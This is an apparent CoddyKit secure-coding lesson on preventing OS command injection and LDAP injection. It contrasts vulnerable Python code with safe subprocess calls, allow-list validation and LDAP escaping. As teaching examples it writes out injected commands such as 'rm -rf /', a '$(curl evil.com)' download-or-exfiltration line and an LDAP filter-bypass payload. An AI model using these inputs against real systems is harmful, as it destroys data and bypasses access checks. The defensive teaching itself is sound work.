Befehls- und LDAP-Injection verhindern
Lernen Sie, wie OS-Command-Injection und LDAP-Injection funktionieren und wie Sie sich mit sicheren APIs, Allow-Lists und korrekter Kodierung dagegen schützen.
Befehls- und LDAP-Injection verhindern ist eine kostenlose Secure Coding & OWASP Top 10 for Backend-Lektion auf CoddyKit. Dies ist Lektion 4 von 4. Du kannst die komplette Lektion unten kostenlos lesen – dann übst du sie direkt im Browser mit einem integrierten Code-Editor und einem KI-Tutor rund um die Uhr. Sie ist Teil des Secure Coding & OWASP Top 10 for Backend-Lernpfads, und dein Fortschritt wird über Web und CoddyKit-App synchronisiert. Der Secure Coding & OWASP Top 10 for Backend-Kurs umfasst insgesamt 4 Lektionen.
Teile dieser Lektion wurden noch nicht übersetzt und werden auf Englisch angezeigt.
Beyond SQL Injection
Injection is not limited to SQL. Any time untrusted input is mixed into a command interpreter, you risk injection. Two dangerous cousins are OS command injection and LDAP injection.
This lesson shows how both work and how to stop them.
How Command Injection Works
Command injection happens when user input is passed to a shell. Shell metacharacters like ;, &&, and | let an attacker append their own commands.
- Input
file.txt; rm -rf /can delete data - Input
$(curl evil.com)can exfiltrate or download
The Vulnerable Pattern
The danger is invoking a shell with a concatenated string. Here the user controls part of the command line.
import os
def ping(host):
# DANGEROUS: host is interpolated into a shell command
os.system('ping -c 1 ' + host)
# ping('8.8.8.8; rm -rf /tmp/data') runs two commandsUse Safe APIs
The fix is to avoid the shell entirely. Pass arguments as a list to an exec-style API so the OS treats input as a single argument, never as syntax.
import subprocess
def ping(host):
# SAFE: no shell, host is a single argument
subprocess.run(['ping', '-c', '1', host], shell=False, check=True)Validate with Allow-Lists
When input feeds a command, restrict it to a known-good pattern. An allow-list rejects anything outside an expected set instead of trying to block bad characters.
import re
def is_valid_host(host):
pattern = r'^[a-zA-Z0-9.-]{1,253}$'
return re.match(pattern, host) is not None
print(is_valid_host('example.com'))
print(is_valid_host('8.8.8.8; rm -rf /'))Avoid Shell Features
Never enable shell=True, eval, or string-based command builders with untrusted data. If you must use a shell, escape arguments with the platform quoting function, but prefer the no-shell approach.
What Is LDAP Injection?
LDAP injection targets directory queries used in authentication and lookups. Special characters like *, (, ), and \ alter the filter logic.
An input of * in a username field can match every entry, bypassing access checks.
Vulnerable LDAP Filter
Building filters by string concatenation lets attackers rewrite the query.
def build_filter(username):
# DANGEROUS: username can contain LDAP metacharacters
return '(&(uid=' + username + ')(active=TRUE))'
# build_filter('*)(uid=*') opens the filter to all usersEscaping LDAP Input
Escape special characters before inserting them into a filter, per RFC 4515. Most LDAP libraries provide an escape helper, use it for every dynamic value.
def escape_ldap(value):
replacements = {'\\': '\\5c', '*': '\\2a', '(': '\\28', ')': '\\29', '\x00': '\\00'}
out = ''
for ch in value:
out += replacements.get(ch, ch)
return out
print(escape_ldap('*)(uid=*'))Defense in Depth
Combine safe APIs, allow-list validation, and least privilege. Run processes under low-privilege accounts so even a successful injection cannot do much.
- No shell where possible
- Validate every input
- Drop privileges before executing
Testing for Injection
Probe inputs with metacharacters during testing: semicolons and pipes for command fields, asterisks and parentheses for LDAP fields. Automated DAST tools and code review both help catch these flaws early.
Quick Check
Test your understanding of injection defenses.
Recap
You learned how command injection and LDAP injection work and how to stop them: avoid the shell with safe exec APIs, use allow-list validation, escape LDAP special characters, and apply least privilege. Treat every interpreter boundary as a place where injection can occur.
Häufig gestellte Fragen
Ist die Lektion „Befehls- und LDAP-Injection verhindern“ kostenlos?
Ja — der vollständige Text von „Befehls- und LDAP-Injection verhindern“ ist hier im Web kostenlos zu lesen. Um sie interaktiv zu üben (integrierter Code-Editor und 24/7 KI-Tutor) und den Rest des Secure Coding & OWASP Top 10 for Backend-Kurses freizuschalten, upgrade auf CoddyKit PRO. Der Secure Coding & OWASP Top 10 for Backend-Kurs umfasst insgesamt 4 Lektionen.
Was lerne ich in „Befehls- und LDAP-Injection verhindern“?
Lernen Sie, wie OS-Command-Injection und LDAP-Injection funktionieren und wie Sie sich mit sicheren APIs, Allow-Lists und korrekter Kodierung dagegen schützen. Du übst Secure Coding & OWASP Top 10 for Backend mit praktischem Code, den du direkt im Browser ausführst, und ein 24/7 KI-Tutor beantwortet deine Fragen während du die Lektion bearbeitest.
Brauche ich Erfahrung, um Secure Coding & OWASP Top 10 for Backend zu starten?
Keine Vorkenntnisse erforderlich. Secure Coding & OWASP Top 10 for Backend auf CoddyKit ist für Anfänger bis fortgeschrittene Lernende strukturiert, sodass du hier starten oder von Anfang an beginnen und in deinem eigenen Tempo voranschreiten kannst. Dies ist Lektion 4 von 4.
Wie lange dauert die Lektion „Befehls- und LDAP-Injection verhindern“?
Die meisten CoddyKit-Lektionen dauern etwa 5–10 Minuten. Jede ist kompakt und interaktiv, sodass du stetig Fortschritte machst und genau dort weitermachst, wo du aufgehört hast – im Web und in der App.
Kann ich in dieser Secure Coding & OWASP Top 10 for Backend-Lektion Code schreiben und ausführen?
Ja. Jede Secure Coding & OWASP Top 10 for Backend-Lektion enthält einen integrierten Code-Editor, sodass du echten Code direkt in deinem Browser schreibst und ausführst und sofort KI-Feedback erhältst — ohne lokale Einrichtung erforderlich.
Alle Lektionen in diesem Kurs
- Fortgeschrittene SQLi- und NoSQLi-Techniken
- Umfassende Strategien zur Eingabevalidierung
- Content Security Policy (CSP) für das Backend
- Befehls- und LDAP-Injection verhindern